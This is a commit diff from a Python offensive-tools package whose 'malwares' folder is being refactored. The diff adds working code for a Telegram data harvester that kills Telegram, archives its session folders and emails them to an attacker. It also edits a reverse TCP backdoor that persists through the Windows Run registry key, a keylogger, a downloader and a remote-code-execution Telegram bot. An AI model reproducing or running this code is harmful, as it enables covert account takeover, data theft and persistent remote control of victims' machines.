refactor modules

update requirements

pyhtools/executable_generator/utils.py

@@ -0,0 +1,2 @@
+from pyhtools.UI.colors import *
+

pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py

@@ -3,13 +3,13 @@
 from subprocess import check_output
 
 
-# root_dir = os.path.dirname(__file__)
+# set API_KEY and CHAT_ID before starting bot
 API_KEY = 'your_bot_key/token'
 CHAT_ID =  0 # int - attacker's user id
 # to find user id, start the bot, and message this bot with /start
 
 
-# password = 'password' // password is reserved for future work
+# password = 'password' # reserved for future idea regarding authentication
 help_message = '''
 Remote Code Executor BOT 
 Written by Dhrumil Mistry

pyhtools/malwares/downloader/downloader.py

@@ -1,4 +1,3 @@
-#!usr/bin/env python
 import requests
 
 def download(url:str)->bool:
@@ -17,7 +16,3 @@ def download(url:str)->bool:
     except Exception as e:
         print('[-] Exception : ', e)
         return False
-
-
-url = 'https://upload.wikimedia.org/wikipedia/commons/thumb/4/48/Ludwig_Guttmann2.jpg/800px-Ludwig_Guttmann2.jpg'
-download(url)

pyhtools/malwares/keylogger/keylogger.py

@@ -1,5 +1,3 @@
-#!usr/bin/env python3
-from types import MemberDescriptorType
 import pynput, threading, subprocess, smtplib
 
 class KeyLogger:

pyhtools/malwares/reverse_backdoor/HTTP/listener.py

@@ -1,4 +1,3 @@
-from sys import stderr
 from http.server import BaseHTTPRequestHandler, HTTPServer
 
 

pyhtools/malwares/reverse_backdoor/TCP/listener.py

@@ -151,13 +151,13 @@ def run(self):
             except IndexError:
                 print('[!] Cannot Accept empty command.')
 
-            # except Exception as e:
-            #     print('[-] Listener Exception : ', e)
+            except Exception as e:
+                print('[-] Listener Exception : ', e)
 
 
 if __name__ == '__main__':
     try:
-        listener = Listener('192.168.0.199',8082)
+        listener = Listener('127.0.0.1',4444)
         listener.run()
     except Exception as e:
         print('[-] Exception : ',e)

pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py

@@ -1,4 +1,3 @@
-#!usr/bin/env python3
 import socket
 import subprocess
 import json
@@ -26,20 +25,18 @@ def __init__(self, ip:str, port:int)->None:
 		self.connect_to_listener()
 
 
-	def create_persistence(self):
+	def create_persistence(self, backdoor_name:str='MyBackdoor.exe'):
 		'''
 		description: tries to connect to user when machine restarts.
 		params: None
         returns: None
 		'''
 		if os.name == 'nt':
-			# print('inside persistence if.')
 			# TODO: Change MyBackdoor to something less suspectful before creating exe
-			backdoor_file_path = os.environ['appdata'] + '\\MyBackdoor.exe'
+			backdoor_file_path = f'{os.environ["appdata"]}\\{backdoor_name}'
 			if not os.path.exists(backdoor_file_path):
-				# print('inside if if.')
 				shutil.copy(sys.executable, backdoor_file_path)
-				subprocess.call(f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MyBackdoor /t REG_SZ /d "{backdoor_file_path}"')
+				subprocess.call(f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v {backdoor_name.removesuffix(".exe")} /t REG_SZ /d "{backdoor_file_path}"')
 
 
 	def connect_to_listener(self):
@@ -209,7 +206,7 @@ def run(self):
 
 if __name__ == '__main__':
 	try :
-		backdoor = ReverseBackdoor(ip='192.168.0.199', port=8082)
+		backdoor = ReverseBackdoor(ip='127.0.0.1', port=4444)
 		backdoor.run()
 	except Exception as e:
 		print('Exception :',e)

pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py

@@ -1,138 +1,155 @@
-import time, os, psutil, shutil, smtplib, tempfile, subprocess
+import time
+import os
+import psutil
+import shutil
+import smtplib
+import tempfile
+import subprocess
 from email.mime.multipart import MIMEMultipart
 from email.mime.base import MIMEBase
 from email import encoders
 
-# start timer
-# start_time = time.time()
-
-# move current location to temp directory
-temp_path = tempfile.gettempdir()
-os.chdir(temp_path)
-
-# create list to save tdata paths found
-tdata_paths = []
-
-
-def find_tdata_in(path):
-    '''
-    description: find tdata in specific location
-    '''
-    tdata_path = None
-    for root, dirs, files in os.walk(path):
-        for dir in dirs:        
-            if 'telegram' in dir.lower():
-                telegram_path = os.path.join(root, dir)
-
-                tdata_path = os.path.join(telegram_path, 'tdata')
-                if os.path.isdir(tdata_path) and tdata_path not in tdata_paths:
-                    tdata_paths.append(tdata_path)
-
-
-def terminate_td(): 
-    '''
-    description: kills Telegram processes if running
-    '''
-    if os.name == 'nt':
-        import wmi
-        f = wmi.WMI()
-        for process in f.Win32_Process():
-            if 'telegram' in process.name.lower():
-                process.Terminate()
-    else:
-        processes = subprocess.Popen('ps -A', shell=True, stdout=subprocess.PIPE)
-        output, error = processes.communicate()
-
-        for line in output.splitlines():
-            if 'telegram' in str(line).lower():
-                pid = int(line.split(None, 1)[0])
-                os.kill(pid, 9)
-
-
-def send_zip(zip_path):
-    '''
-    description: report tdata zip to the attacker
-    '''
-    try:
-        DESTINATION_ARCHIVE_NAME = zip_path
-        SUBJECT = "Telegram Data {}".format(zip_path)
-        # separate emails using comma
-        RECIPIENTS = "[email protected]" 
-
-        server = "smtp.gmail.com"
-        port = 587
-        username = "yourgmailid"
-        password = "yourAppPassword"
-        sender = username
-
-        msg = MIMEMultipart()
-        msg['Subject'] = SUBJECT
-        msg['From'] = sender
-        msg['To'] = RECIPIENTS
-
-        part = MIMEBase("application", "octet-stream")
-        part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read())
-        encoders.encode_base64(part)
-        part.add_header("Content-Disposition", "attachment; filename=\"%s\"" % (DESTINATION_ARCHIVE_NAME))
-        msg.attach(part)
-
-        smtp = smtplib.SMTP(server, port)
-        smtp.ehlo()
-        smtp.starttls()
-        smtp.ehlo()
-        smtp.login(username,password)
-        smtp.sendmail(sender, RECIPIENTS, msg.as_string())
-        smtp.close()
-
-    except Exception as e:
-        # print(e)
-        pass
-
-
-
-def create_archive_and_send_mail(source_path:str, dest_path:str):
-    '''
-    desciption: creates archive and send email 
-    '''
-    os.chdir(dest_path)
-    terminate_td()
-    zip_name = 'tdata_zip_file_{}'.format(time.time()) 
-    shutil.make_archive(zip_name,'zip', dest_path, source_path)
-    zip_path = os.path.join(dest_path, zip_name + '.zip')
-    send_zip(zip_path)
-    os.chdir(dest_path)
-    os.remove(zip_path)
-
-def search_in_paritions():
-    '''
-    description: search for telegram data in mounted partitions
-    '''
-    partitions = psutil.disk_partitions()
-    for partition in partitions:
-        find_tdata_in(partition.mountpoint)
-
-
-# target os specific locations to search for tdata
-if os.name == 'nt':
-    probable_installation_paths = [ os.environ['APPDATA'],
-                                    os.environ['ALLUSERSPROFILE'],
-                                    os.environ['LOCALAPPDATA'],
-                                    os.environ['PROGRAMW6432'],
-                                    os.environ['PROGRAMFILES(X86)'],
-                                    ]
-
-
-else:
-    probable_installation_paths = [os.environ['HOME'],
-                                    ] 
-
-# first search in probable installation locations
-for path in probable_installation_paths:
-    find_tdata_in(path) 
-
-terminate_td()
-search_in_paritions()
-for tpath in tdata_paths:
-    create_archive_and_send_mail(source_path=tpath, dest_path=temp_path)
-
-# print('process Completed in ', time.time() - start_time)
+
+class TelegramHarvester:
+    def __init__(self, sender_email: str, sender_passwd: str, server: str = "smtp.gmail.com", port: int = 587, receivers: list[str] = None):
+        # move current location to temp directory
+        self.temp_path = tempfile.gettempdir()
+        os.chdir(self.temp_path)
+
+        # create list to save tdata paths found
+        self.tdata_paths = []
+
+        # email configurations
+        self.sender_email = sender_email
+        self.sender_passwd = sender_passwd
+        self.server = server
+        self.port = port
+        self.receivers = receivers
+
+    def find_tdata_in(self, path):
+        '''
+        description: find tdata in specific location
+        '''
+        tdata_path = None
+        for root, dirs, files in os.walk(path):
+            for dir in dirs:
+                if 'telegram' in dir.lower():
+                    telegram_path = os.path.join(root, dir)
+
+                    tdata_path = os.path.join(telegram_path, 'tdata')
+                    if os.path.isdir(tdata_path) and tdata_path not in self.tdata_paths:
+                        self.tdata_paths.append(tdata_path)
+
+    def terminate_td(self):
+        '''
+        description: kills Telegram processes if running
+        '''
+        if os.name == 'nt':
+            import wmi
+            f = wmi.WMI()
+            for process in f.Win32_Process():
+                if 'telegram' in process.name.lower():
+                    process.Terminate()
+        else:
+            processes = subprocess.Popen(
+                'ps -A', shell=True, stdout=subprocess.PIPE)
+            output, error = processes.communicate()
+
+            for line in output.splitlines():
+                if 'telegram' in str(line).lower():
+                    pid = int(line.split(None, 1)[0])
+                    os.kill(pid, 9)
+
+    def send_zip(self, zip_path):
+        '''
+        description: report tdata zip to the attacker
+        '''
+        try:
+            DESTINATION_ARCHIVE_NAME = zip_path
+            SUBJECT = "Telegram Data {}".format(zip_path)
+
+            # separate emails using comma
+            RECIPIENTS = ','.join(self.receivers)
+
+            msg = MIMEMultipart()
+            msg['Subject'] = SUBJECT
+            msg['From'] = self.sender_email
+            msg['To'] = RECIPIENTS
+
+            part = MIMEBase("application", "octet-stream")
+            part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read())
+            encoders.encode_base64(part)
+            part.add_header("Content-Disposition",
+                            "attachment; filename=\"%s\"" % (DESTINATION_ARCHIVE_NAME))
+            msg.attach(part)
+
+            smtp = smtplib.SMTP(self.server, self.port)
+            smtp.ehlo()
+            smtp.starttls()
+            smtp.ehlo()
+            smtp.login(self.sender_email, self.sender_passwd)
+            smtp.sendmail(self.sender_email, RECIPIENTS, msg.as_string())
+            smtp.close()
+
+            return True
+
+        # ignore any exceptions occurred
+        except Exception as e:
+            # print(e)
+            return False
+
+    def create_archive_and_send_mail(self, source_path: str, dest_path: str):
+        '''
+        desciption: creates archive and send email 
+        '''
+        os.chdir(dest_path)
+        self.terminate_td()
+        zip_name = 'tdata_zip_file_{}'.format(time.time())
+        shutil.make_archive(zip_name, 'zip', dest_path, source_path)
+        zip_path = os.path.join(dest_path, zip_name + '.zip')
+        self.send_zip(zip_path)
+        os.chdir(dest_path)
+        os.remove(zip_path)
+
+    def search_in_paritions(self,):
+        '''
+        description: search for telegram data in mounted partitions
+        '''
+        partitions = psutil.disk_partitions()
+        for partition in partitions:
+            self.find_tdata_in(partition.mountpoint)
+
+    def start(self):
+        # target os specific locations to search for tdata
+        if os.name == 'nt':
+            probable_installation_paths = [
+                os.environ['APPDATA'],
+                os.environ['ALLUSERSPROFILE'],
+                os.environ['LOCALAPPDATA'],
+                os.environ['PROGRAMW6432'],
+                os.environ['PROGRAMFILES(X86)'],
+            ]
+
+        else:
+            probable_installation_paths = [
+                os.environ['HOME'],
+            ]
+
+        # first search in probable installation locations
+        for path in probable_installation_paths:
+            self.find_tdata_in(path)
+
+        self.terminate_td()
+        self.search_in_paritions()
+        for tpath in self.tdata_paths:
+            self.create_archive_and_send_mail(
+                source_path=tpath, dest_path=self.temp_path)
+
+if __name__ == '__main__':
+    tdata_harvester = TelegramHarvester(
+        sender_email='dummy_email', # dummy email to send collected data
+        sender_passwd='dummy_email_passwd', # dummy email account password for authentication
+        server='smtp.gmail.com', # smtp email server domain
+        port=587, # smtp server port
+        receivers='attacker_email', # email where harvested data will sent
+    )